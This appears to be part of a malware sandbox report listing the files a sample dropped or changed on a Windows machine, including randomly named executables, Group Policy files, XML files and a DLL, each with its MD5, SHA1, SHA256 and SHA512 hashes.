C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\rjhsLhD.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b71d4c4e1b2d7eb58d8f15dbe2353afa
SHA1 cc10b9b89754e901a223bd962c7ffd507ef9c92b
SHA256 d87262f6bc8d9b814c2a1c2313f0da7a38a9cbe5e8813e02f83af2f05641e9ab
SHA512 bc000b49c1d0bc77eaa5aa68243beeb96b6b56b3982391053bf8fc82db738273cfea3c62c4772c1e37af08959cd56a4145930e093729cd7a4174f7001cfdd7f0

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dbf9fec0284459c885c695c96fdd4e67
SHA1 f3530eb549137596bb53cde08a3e3cc1ea237faf
SHA256 3cc2ef28f616ca2a6e5fb06da63d6bdb53b63e92701ecee38e84f98b7f56b38a
SHA512 95a7858d009940a1c29f9c05c2bd2a6a03a3122fe749546d87e435b5d3172fd0d22dec099b450be3ea99c58b8681484eafd8ad00be1364d9085fc4a9f249f452

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\eFmlnQl.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 279c01cba658fc0ad82f3c201619656c
SHA1 d73ebfda7c8708716b10de2819a7fed64a295e60
SHA256 ac063b67eaa6a6476ab856e4bd9ff4cf79bbe831880b18eb1cbb34948c7c6cab
SHA512 cf385228df756d6fc05a52e8883e89df71dc91434255143a200d9ed5eba13ce8a3635bc82991ea38bd35531056b3d286be785b451dab638b18293477f7542a55

C:\Program Files (x86)\SvbbHukzU\FSnEmZP.xml

MD5 cff7e99fdb298b59c84ab72b4f59acab
SHA1 359211c6bdb2b23c8aee1077b4dfca6ee1284aa0
SHA256 ab6b789943fbf121ea5b80f159304198953f56bd870ebc46c9f15f654d1765bb
SHA512 5d41a1ce7e8fd42e3c024bb3cc9b2441379c41568a6244b08ccbbbc8f5f12267e2470447dab295bab91318e2db96e8212229fe772b5292b4b7be56195e186951

C:\Program Files (x86)\yOvDRBMJNKKU2\HtGLGFQ.xml

MD5 d72db60b466651d1b4bc37acd91799fc
SHA1 bcbb91196a5fd5146ab2ad51298f9d3c0dfa6dc4
SHA256 4a9c3d57d8e2eb9ac6ed6d1356d869fc25b26b0b812c2f77c2dd4dc00c0311a3
SHA512 fb5b0019c417625ae4a316b36e42cb34f051afd9bd6fe72097f448da953fbeeed10836ee414d2f93a7b53c65bf590515f37f4b50a1e779b2d7e99bcc9db307a9

C:\ProgramData\YVKeAuHUOaLCRzVB\MntzzYJ.xml

MD5 b2b03d537ee0b4e3751543480baa29d1
SHA1 265be2adae465f91009a20a3a82226ae26315f9b
SHA256 13eb3ff51647766a3a411a48cdd1f28c3534892f2d1c6ac8d76bedfc3e14822d
SHA512 e7b873c3f600b4d01fcb3602ea863369a818f55088c2848870dbb1860dc4878e1d15da06f02a9694fcdc80d547f7ae6b5fa3d8610c883097a0cd5994deb8394e

C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\afuTILY.xml

MD5 ba33450f293914291cac22854c87db1b
SHA1 3dcaf6dc9240559b285720e6e435022a4b3b5349
SHA256 6d2bb7b182841338a7c2eda090b78e5854b5666bc5e94e2645388298b7314c92
SHA512 bafbd41139845d6b2a4e3c5aacd425d9de59ca6ab39e37bd76c541fd78c5219179d9a385f7cef144d5db61539de5c05282b7e4e102ef5c442ffbe58d188fc88d

C:\Program Files (x86)\XYDCXZXPsTrrC\EmzDSqI.xml

MD5 536e02e2d218629a626bc4e3315ba70a
SHA1 ff747ff227ad375ece23ee521eb2ec6a7360e217
SHA256 29f4f43f36de038b6d4903f7ebd13116a380c13de7215bebd391a98c59349a61
SHA512 e2ae8829de4b436f8e14921964b4f9d7915c9a12ff04951e9f887637535ef103ae3a7df7e99238ede89751b06d5aa4522ca00e4e771e7b78f3417f80f13e24b1

C:\Windows\Temp\grMXAHIUMHIHAuvw\qGnJVfqS\GRGAgDv.dll

MD5 b741306fbb35688df1c40ec6572783b7
SHA1 4d8f5b3698a82cbb3007ee6a21f3df1de5a24fa7
SHA256 fe578f2302cb40e6ba3044239dd2a0c1c722f0a32b68877191dbbb10b798ee41
SHA512 6017a55935f1ac4286656a47e55adfd2896a799a436d166e6478921ed0c104caa9edc0e050f313aba544989356a3a91cc08998fc5e91dfd634a0ed419bbab927
